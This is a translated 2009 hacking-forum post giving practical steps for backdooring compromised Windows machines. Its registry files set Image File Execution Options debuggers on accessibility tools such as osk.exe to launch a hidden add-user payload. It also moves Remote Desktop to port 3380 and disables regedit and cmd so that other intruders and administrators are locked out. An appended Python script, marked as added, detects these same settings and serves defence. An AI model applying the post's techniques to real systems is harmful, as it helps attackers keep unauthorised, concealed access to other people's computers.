Registry and Group Policy Backdoor found letters

2009-01-06T00:00:00
ID MYHACK58:62200921830
Type myhack58
Reporter Anonymous
Modified 2009-01-06T00:00:00

Description

Notes from testing. Anyone interested can try combining these; it may yield some tips on backdoor placement.

Silent import:

    regedit /s *.reg

Method one: cancel sticky keys by importing a .reg file (sethc.reg)

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]
    "Flags"="506"

    [HKEY_USERS\.DEFAULT\Control Panel\Accessibility\StickyKeys]
    "Flags"="506"

After the registry file is imported, the cancellation takes effect. That is, the original value 510 is changed to 506.

Method two: Start → Control Panel → Accessibility Options → Keyboard → StickyKeys → Settings, then uncheck the "Use shortcut" checkbox.

High contrast: Left ALT + left SHIFT + PRINT SCREEN.
Mouse keys: Left ALT + left SHIFT + NUM LOCK.

These two can still bring up sethc.exe for backdoor use. We cannot be like everyone else with the same shift 5 times; in fact, these call the same thing.

C:\WINDOWS\system32\utilman.exe (Utility Manager), called with WIN+U
C:\WINDOWS\system32\osk.exe (On-Screen Keyboard)
C:\WINDOWS\system32\magnify.exe (Magnifier)

Note: several of these can be used with the image method.

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]
    "debugger"="c:\\WINDOWS\\System32\\wbem\\ysjy.exe"

sethc.exe gives better results with the image method.

Based on the above, we can make the following backdoor: the VBS add-user script (http://bbs.77169.com/mainframe.php?tid=225157&fid=161) is made into a password-protected self-extracting ysjy.exe. The advantages are as follows:

1. The VBS is run with the //B parameter, which prevents unnecessary dialog windows from appearing when the user is added repeatedly.
2. Note that automatic deletion after use can be achieved through self-extraction. Haha, script encryption is fully reversible.
3. Whatever backdoor someone else replaces sethc.exe with, it does not affect your own backdoor. Haha, friends, if you come across this, what then?
4. It can be used with cmd disabled, which prevents others from using cmd.
5. With a password it is always much more secure; my own attempt to crack the self-extracting archive with a rar tool was unsuccessful.
6. Pressing shift 5 times does not bring it up, which is out of the ordinary. For the call method, see above.

The following code is for protecting your own results. In practice, very few people protect their own results.

Changing the remote port to 3380 (3380.reg)

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]
    "PortNumber"=dword:00000d34

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
    "PortNumber"=dword:00000d34

It is necessary to change the remote port; a lot of people still like to check, before intruding, whether 3389 has a shift backdoor.

Registry disable and recovery

Disable:

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "DisableRegistryTools"=dword:00000001

Note: once this is set, restoring by importing a registry file will not work.

Recovery: gpedit.msc → User Configuration → Administrative Templates → System; in the right pane, set "Prevent access to registry editing tools" to Disabled.

Alternatively: right-click → New → Shortcut, and in the "Type the location of the item" input box of the pop-up window enter the following example, which achieves the corresponding function (unlocking the registry):

    %WinDir%\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Disabling the registry on a compromised machine improves safety a lot. The above code has been tested; what is found online does not necessarily work.

Disable CMD

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
    "DisableCMD"=dword:00000001

Setting the value to 00000000 restores it.

Right-click → New → Shortcut, and in the "Type the location of the item" input box of the pop-up window enter the following example, which achieves the corresponding function without the registry editor. The registry can also be modified through the additional parameters in the rar.

    %WinDir%\System32\reg.exe add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Disabling CMD raises the difficulty of privilege escalation for other intruders quite a bit. These can be combined and used together.

Incidentally, no ready-made tool is provided here; for people too lazy to do it themselves, I can't help. As the saying goes, you are your own best teacher.
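For defenders, the registry changes described above are all visible in a registry export. The following is an added example, not part of the original post: a small triage script that parses .reg export text and flags the settings this page discusses. The function names, finding labels and sample export are constructed for illustration, and sethc.exe (the Sticky Keys binary) is included in the watch list alongside the binaries the page names.

```python
import re

# Accessibility binaries to watch; a Debugger value under their IFEO key is a red flag.
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe"}
IFEO = "\\image file execution options\\"

def parse_reg(text):
    """Yield (key, value_name, raw_data) from .reg export text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = re.match(r'"([^"]+)"\s*=\s*(.*)', line)
            if m:
                yield key, m.group(1), m.group(2)

def dword(data):
    m = re.fullmatch(r"dword:([0-9a-fA-F]{1,8})", data)
    return int(m.group(1), 16) if m else None

def findings(text):
    out = []
    for key, name, data in parse_reg(text):
        k, n = key.lower(), name.lower()
        if IFEO in k and n == "debugger" and k.rsplit("\\", 1)[1] in ACCESSIBILITY:
            out.append(("ifeo-debugger", key, data))
        elif n == "portnumber" and "\\terminal server\\" in k and dword(data) not in (None, 3389):
            out.append(("rdp-port-changed", key, dword(data)))
        elif n in ("disableregistrytools", "disablecmd") and dword(data):
            out.append((n, key, dword(data)))
        elif n == "flags" and k.endswith("\\stickykeys") and data.strip('"') == "506":
            out.append(("stickykeys-shortcut-off", key, data))
    return out

# Constructed sample export, using keys and values of the kind shown on this page.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]
"debugger"="c:\\WINDOWS\\System32\\wbem\\ysjy.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d34
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000001
[HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]
"Flags"="510"
'''
if __name__ == "__main__":
    print(*findings(SAMPLE), sep="\n")
```

Files exported by regedit are normally UTF-16, so decode them to text before passing them to findings().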